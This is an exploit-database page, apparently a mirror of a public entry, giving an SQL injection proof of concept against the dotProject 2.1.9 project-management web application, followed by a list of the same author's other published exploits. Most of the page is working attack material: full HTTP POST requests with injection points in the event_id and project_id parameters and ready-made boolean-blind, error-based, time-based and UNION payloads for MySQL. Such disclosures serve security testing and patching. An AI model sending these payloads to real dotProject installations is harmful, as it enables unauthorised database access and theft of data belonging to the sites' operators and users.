Search for hundreds of thousands of exploits

"dotProject 2.1.9 - SQL Injection"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2019-06-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc)
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://dotproject.net
# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip
# Version: 2.1.9
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves.

==================================================================


event_id (POST) - Sql injection PoC

POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1
Host: xxx.xxx.x.xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1

dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&
event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&
end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on




Parameter: event_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on



==================================================================


MULTIPART project_id ((custom) POST) - Sql Injection Poc

POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit
Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620
Content-Length: 2749
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="dosql"

do_project_aed
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_id"

[SQLi]
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_creator"

1
.
..snip
..snip
.

-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="import_tasks_from"

0
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_description"

fasdf
-----------------------------9310663371787104596119761620--



Parameter: MULTIPART project_id ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)


#
#
#
Release DateTitleTypePlatformAuthor
2020-07-15"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)"webappshardware"Metin Yunus Kandemir"
2020-07-08"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)"webappshardware"Metin Yunus Kandemir"
2020-04-21"CSZ CMS 1.2.7 - 'title' HTML Injection"webappsphp"Metin Yunus Kandemir"
2020-04-21"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-01-07"Complaint Management System 4.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-03"Online Course Registration 2.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-01"Shopping Portal ProVersion 3.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2020-01-01"Hospital Management System 4.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2019-12-09"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-13"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-08-01"Ultimate Loan Manager 2.0 - Cross-Site Scripting"webappsmultiple"Metin Yunus Kandemir"
2019-07-12"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-06-24"dotProject 2.1.9 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-05-29"Free SMTP Server 2.5 - Denial of Service (PoC)"doswindows"Metin Yunus Kandemir"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47021/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.